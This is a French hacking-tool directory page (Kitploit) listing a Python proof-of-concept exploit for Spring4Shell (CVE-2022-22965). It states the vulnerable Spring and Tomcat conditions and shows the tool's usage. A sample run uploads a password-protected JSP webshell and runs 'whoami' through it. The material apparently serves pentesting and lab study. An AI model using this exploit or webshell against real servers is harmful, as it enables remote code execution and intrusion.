Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Spring4Shell-CVE-2022-22965 — Exploit de preuve de concept basé sur Python pour CVE-2022-22965 (Spring4Shell) ciblant l'exécution de code à distance (RCE) sur Java Spring Core via Apache Tomcat. Télécharge un webshell JSP avec protection par mot de passe pour l'exécution de commandes à distance. | Kitploit
Outils/GitHubGitHub/sohamsharma966/spring4shell-cve-2022-22965
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubsohamsharma966/spring4shell-cve-2022-22965

Spring4Shell-CVE-2022-22965

Exploit de preuve de concept basé sur Python pour CVE-2022-22965 (Spring4Shell) ciblant l'exécution de code à distance (RCE) sur Java Spring Core via Apache Tomcat. Télécharge un webshell JSP avec protection par mot de passe pour l'exécution de commandes à distance.

Voir le dépôt
2il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Spring4Shell: CVE-2022-22965 RCE

Vulnérabilité RCE du framework Java Spring

Ces vulnérabilités affectent un composant "Spring Core" — le cœur du framework

Conditions actuelles pour la vulnérabilité :

  • JDK 9+
  • Une version vulnérable du Spring Framework (<5.2 | 5.2.0-19 | 5.3.0-17)
  • Apache Tomcat comme serveur pour l'application Spring, empaqueté en tant que WAR
  • Une dépendance aux composants spring-webmvc et/ou spring-webflux du Spring Framework

L'exploit

user@attacker:~$ ./exploit.py --help
usage: exploit.py [-h] [-f FILENAME] [-p PASSWORD] [-d DIRECTORY] url

Spring4Shell RCE Proof of Concept

positional arguments:
  url                   Target URL

optional arguments:
  -h, --help            show this help message and exit
  -f FILENAME, --filename FILENAME
                        Name of the file to upload (Default tomcatwar.jsp)
  -p PASSWORD, --password PASSWORD
                        Password to protect the shell with (Default: thm)
  -d DIRECTORY, --directory DIRECTORY
                        The upload path for the file (Default: ROOT)
user@attacker:~$ ./exploit.py http://MACHINE_IP/
Shell Uploaded Successfully!


# OUTPUT= Your shell can be found at: http://MACHINE_IP/tomcatwar.jsp?pwd=thm&cmd=whoami
Télécharger l’outil